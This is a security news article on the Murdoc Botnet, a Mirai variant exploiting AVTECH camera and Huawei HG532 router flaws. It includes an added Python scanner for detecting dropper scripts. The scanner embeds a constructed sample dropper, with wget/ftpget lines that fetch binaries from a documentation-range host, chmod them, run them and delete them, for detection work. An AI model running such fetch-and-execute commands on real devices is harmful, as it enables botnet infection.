
The Qualys Threat Research Unit has disclosed an extensive campaign built on a new variant of the infamous Mirai malware, dubbed the “Murdoc Botnet.” The variant targets AVTECH IP cameras and Huawei HG532 routers, exploiting known vulnerabilities such as CVE-2024-7029 and CVE-2017-17215 to build a large botnet. The campaign, which began in mid-2024, shows how Mirai-based operations continue to evolve in tactics and sophistication.
The Murdoc Botnet spreads using ELF binaries and shell scripts. Once a script lands on a device, it uses the system’s own commands to fetch and run the malicious payload. “Each ShellScript is loaded onto devices such as IP cameras, Network devices, and IoT devices, and, in turn, the C2 server loads the new variant of Mirai botnet, i.e., Murdoc Botnet, into the devices,” the report states.
A typical infection flow involves:
- Downloading the payload using wget or ftpget commands.
- Assigning execution permissions via chmod.
- Executing the payload and subsequently removing it to cover tracks.
The botnet spreads most effectively on unpatched devices: Qualys identified more than 1,300 infected IPs.
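The download, chmod, execute, delete sequence above is a stable signature of Mirai-style droppers, whatever the payload name or host. The following Python scanner is an added example, not code from the Qualys report or from the page; it splits a recovered dropper script (from a honeypot, a device’s shell history, or a proxy log) into individual commands, classifies each command into one of the four stages, and only calls the script a dropper when all four stages are present and at least one file name is shared by the chmod, execute and delete steps. The sample scripts embedded below are constructed for the demo; the 198.51.100.0/24 addresses are from the documentation range and are not real indicators.

```python
"""Heuristic scanner for Mirai-style dropper shell scripts (added example)."""
import re
from dataclasses import dataclass, field

# Download tools commonly present on busybox-based IoT firmware.
DOWNLOADERS = {"wget", "ftpget", "tftp", "curl"}
URL_RE = re.compile(r"(?:https?|ftp|tftp)://\S+")


@dataclass
class DropperReport:
    downloads: list = field(default_factory=list)  # download commands seen
    urls: list = field(default_factory=list)       # URLs pulled out of them
    chmod: list = field(default_factory=list)      # files made executable
    executed: list = field(default_factory=list)   # files run
    removed: list = field(default_factory=list)    # files deleted afterwards

    def stages(self) -> int:
        """Number of distinct dropper stages observed (0..4)."""
        return sum(bool(s) for s in (self.downloads, self.chmod, self.executed, self.removed))

    def dropped_files(self) -> set:
        """File names that were chmod'ed, executed and then removed."""
        return set(self.chmod) & set(self.executed) & set(self.removed)

    @property
    def is_dropper(self) -> bool:
        # All four stages, and the same artifact flows through the last three.
        return self.stages() == 4 and bool(self.dropped_files())


def split_commands(script: str):
    """Yield individual commands, splitting on newlines and shell separators."""
    for raw in re.split(r"\n|;|&&|\|\||\|", script):
        cmd = raw.strip()
        if cmd and not cmd.startswith("#"):
            yield cmd


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def analyze(script: str) -> DropperReport:
    """Classify each command of a shell script into dropper stages."""
    rep = DropperReport()
    for cmd in split_commands(script):
        toks = cmd.split()
        # "/bin/busybox wget ..." -> treat the applet as the program.
        if toks[0].endswith("busybox") and len(toks) > 1:
            toks = toks[1:]
        prog, args = _basename(toks[0]), toks[1:]
        if prog in DOWNLOADERS:
            rep.downloads.append(cmd)
            rep.urls.extend(URL_RE.findall(cmd))
        elif prog == "chmod" and len(args) >= 2:
            rep.chmod.extend(_basename(a) for a in args[1:])  # args[0] is the mode
        elif prog in ("sh", "bash") and args and not args[0].startswith("-"):
            rep.executed.append(_basename(args[0]))
        elif toks[0].startswith("./"):
            rep.executed.append(prog)
        elif prog == "rm":
            rep.removed.extend(_basename(a) for a in args if not a.startswith("-"))
    return rep


# Constructed sample in the style of a Mirai dropper (documentation-range host).
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt
wget http://198.51.100.23/bins/x86 -O x86; chmod +x x86; ./x86 avtech; rm -rf x86
/bin/busybox ftpget -u anonymous -p anonymous 198.51.100.23 mips bins/mips; chmod 777 mips; ./mips avtech; rm -rf mips
"""

# Constructed benign script: downloads, but never chmods/runs/deletes a dropped file.
BENIGN = """wget http://198.51.100.23/update.tar.gz -O /tmp/update.tar.gz
tar xzf /tmp/update.tar.gz -C /opt
"""

if __name__ == "__main__":
    for name, text in (("dropper", SAMPLE_DROPPER), ("benign", BENIGN)):
        rep = analyze(text)
        print(f"{name}: stages={rep.stages()} files={sorted(rep.dropped_files())} "
              f"urls={rep.urls} is_dropper={rep.is_dropper}")
```

Requiring a shared file name across the chmod, execute and delete steps is what keeps ordinary update scripts (download an archive, unpack it) from being flagged; a looser rule that counts any four stage keywords would fire on legitimate provisioning scripts. Extend `DOWNLOADERS` with whatever fetch tools your fleet’s firmware ships.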

The Qualys team identified over 100 distinct command-and-control (C2) servers supporting the operation. These servers distribute payloads and maintain communication with compromised devices. The campaign has had a significant global footprint, with Malaysia, Thailand, Mexico, and Indonesia the most affected countries.
Malaysia was the most affected country, which suggests the botnet concentrates on regions with large numbers of exposed, vulnerable devices.
Murdoc Botnet relies on two well-documented vulnerabilities:
- CVE-2024-7029: a command injection flaw in AVTECH IP cameras, used to plant the malicious payload on the device.
- CVE-2017-17215: a command injection flaw in Huawei HG532 routers, exploited to run attacker-supplied commands.
One of the decoded payloads shows the typical attack sequence: the script targets AVTECH devices in order to propagate the botnet further.
By exploiting known vulnerabilities on unpatched devices, the campaign demonstrates the need for basic hygiene in IoT and network infrastructure: apply vendor fixes where they exist, retire end-of-life hardware that will never receive one, and keep device management interfaces off the public internet.